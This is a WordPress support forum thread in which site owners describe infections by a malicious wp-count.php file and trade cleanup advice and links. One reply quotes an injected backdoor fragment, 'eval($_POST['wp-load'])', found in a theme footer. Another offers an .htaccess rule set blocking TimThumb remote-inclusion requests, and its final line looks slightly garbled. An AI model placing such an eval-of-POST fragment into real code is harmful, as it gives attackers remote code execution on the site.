Title: Malware from wp-count.php
Last modified: August 20, 2016

---

# Malware from wp-count.php

 *  [cosmocatalano](https://wordpress.org/support/users/cosmocatalano/)
 * (@cosmocatalano)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/)
 * Received a malware notification from Google Webmaster tools yesterday for my 
   cycling blog, [http://cyclocosm.com](http://cyclocosm.com), informing me that
   one post and two index pages (yearly for 2012, monthly for June 2012) were putting
   malware on visiting computers from 3rd-party URLs.
 * Reading through the malware report, it became evident that a file called **wp-
   count.php** was serving up JS downloads to users on page load. wp-count.php wasn’t
   part of a relatively clean WP install I had on a different site, and reading 
   the contents of the file, it began “This file is protected by copyright law and
   provided under license. Reverse engineering of this file is strictly prohibited”—
   obviously, something was up.
 * I Googled** “wp-count.php” **and found some mentions of malware attacks, but 
   no real fixes. Twitter search just pulled up this post in Japanese: [http://twitter.com/strive/status/217218845251870722](http://twitter.com/strive/status/217218845251870722)
 * The site was still on 3.4, so I updated to 3.4.1 and tried deleting and renaming
   wp-count.php, but it immediately reappeared. The next step I took was to **delete
   the contents of the file, and replace them with a single “0”**. So far this seems
   to have worked. Google has re-scanned the site and given it a clean bill of health.
 * I don’t have complete control over my site hosting, so I’m talking with my admin
   about reinstalling from a previous version, and then reposting the updates I’d
   made since then.
 * Anyone else encountering/encountered a similar issue?

Viewing 8 replies - 16 through 23 (of 23 total)

[←](https://wordpress.org/support/topic/malware-from-wp-countphp/?output_format=md)
[1](https://wordpress.org/support/topic/malware-from-wp-countphp/?output_format=md)
2

 *  [Amaryder](https://wordpress.org/support/users/amaryder/)
 * (@amaryder)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863090)
 * I m using WordPress with Genesis theme and this is 3rd time i got Malware called
   Wp-count.php file i don’t know how they really Injected this code again and again
   but please help me to resolve this problem!
 *  [perezbox](https://wordpress.org/support/users/perezbox/)
 * (@perezbox)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863091)
 * Yeah, sorry, that really didn’t say anything.
 * What have you done the previous 2 times to get it resolved? Have you followed
   the steps already outlined above?
 * Have you read any of the posts offered by kmessinger?
 * I would also recommend reading this post: [http://blog.sucuri.net/2012/10/dealing-with-todays-wordpress-malware.html](http://blog.sucuri.net/2012/10/dealing-with-todays-wordpress-malware.html)
 * Thanks
 *  [Krishna](https://wordpress.org/support/users/1nexus/)
 * (@1nexus)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863092)
 * > I found both file wp-count and wp-app which are not included by wordpress i
   > think reply me soon.
 * Not necessary that your site can be hacked only through the above files. If you
   found the same files, it only shows that it is a usual way to infect your site.
   There are several other routes for malware to penetrate and damage your sites.
   If you are hacked repeatedly, it means that you leave security holes every time
   you cleanup. Or you may be hosted in an insecure environment that pass on infection
   from other sites on the same server.
 *  [Amaryder](https://wordpress.org/support/users/amaryder/)
 * (@amaryder)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863093)
 * [@krishna](https://wordpress.org/support/users/krishna/) broo how to secure properly
   and resolve this Malware problem broo still getting notification from webmaster
   tools help me!
 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863094)
 * > how to secure properly and resolve this Malware problem
 * There are NO shortcuts.
 * Talk to your host. Find out if anyone else on the server was hacked. Let them
   know you were hacked so they can check the server.
 * You also need to start working your way through these resources:
    [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
    [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  [GiraffeDog](https://wordpress.org/support/users/giraffedog/)
 * (@giraffedog)
 * [13 years, 6 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863096)
 * Do you guys know if your theme is using timthumb.php or thumb.php to resize images?
   This seems to be how some sites are getting breached.
 * You need to check if you’re allowing timthumb.php to be called from remote websites(
   it’s in the prefs somewhere in the file).
 * Additionally you could try adding the following to your .htaccess file. It stops
   the requests dead.
 *     ```
       RewriteEngine On
   
       # TimThumb Forbid RFI By Host Name But Allow Internal Requests
       RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
       RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
       RewriteRule .* index.php [F,L]
       RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
       RewriteRule . – [S=1]‘
       ```
   
 * Source: [http://graphiclineweb.wordpress.com/2012/08/22/stop-timthumb-attacks-at-server/](http://graphiclineweb.wordpress.com/2012/08/22/stop-timthumb-attacks-at-server/)
 *  [hadoanngoc](https://wordpress.org/support/users/hadoanngoc/)
 * (@hadoanngoc)
 * [13 years ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863120)
 * My site was also infected by wp-count and wp-apps.php files. So it’s been a year
   since this topic is raised but no solution? Is this really a wordpress’s vulnerability
   issue or a server configuration problem?
 * I did a google search and also checked my site. I found these files are infected:
   –
   themes/[mytheme]/footer.php (…eval($_POST[‘wp-load’])..) – wp-apps.php and wp-
   count.php are added in root folder – /wp-includes/js/js/*.php are added – /wp-
   includes/wp-var.php is added – index.php files – wp-register.php; xmlrpc.php;
   wp-comments-post.php; wp-links-opml.php files are infected
 * So find out infected files are easy, I can remove the injected code or re-install
   a fresh copy. but HOW they are infected? How can it changes the file content 
   and adds new files??? Please, WordPress developers & masters?
 * (my site is on Centos 5 server, Apache 2.2 and PHP 5.4)
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863121)
 * > Your blog being “hacked” is not a security issue. A security issue will involve
   > knowing how the attacker got in and hacked your site. If you have details on
   > the attack vector, then email us.
 * [http://codex.wordpress.org/FAQ_Security#What_is_a_.22security.22_issue.3F](http://codex.wordpress.org/FAQ_Security#What_is_a_.22security.22_issue.3F)
 * For starters, why are you using an older version of WorPress. The current version
   is 3.5.1 – not 3.4.1.
 * You need to start working your way through these resources:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Anything less will probably result in the hacker walking straight back into your
   site again.
 * Additional Resources:
    [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 * Next time, and as per the [Forum Welcome](http://codex.wordpress.org/Forum_Welcome#Where_To_Post),
   please post your own topic instead of tagging onto a 9-month old topic.

Viewing 8 replies - 16 through 23 (of 23 total)

[←](https://wordpress.org/support/topic/malware-from-wp-countphp/?output_format=md)
[1](https://wordpress.org/support/topic/malware-from-wp-countphp/?output_format=md)
2

The topic ‘Malware from wp-count.php’ is closed to new replies.

## Tags

 * [compromised site](https://wordpress.org/support/topic-tag/compromised-site/)
 * [javascript](https://wordpress.org/support/topic-tag/javascript/)
 * [page load](https://wordpress.org/support/topic-tag/page-load/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 23 replies
 * 13 participants
 * Last reply from: [esmi](https://wordpress.org/support/users/esmi/)
 * Last activity: [13 years ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863121)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics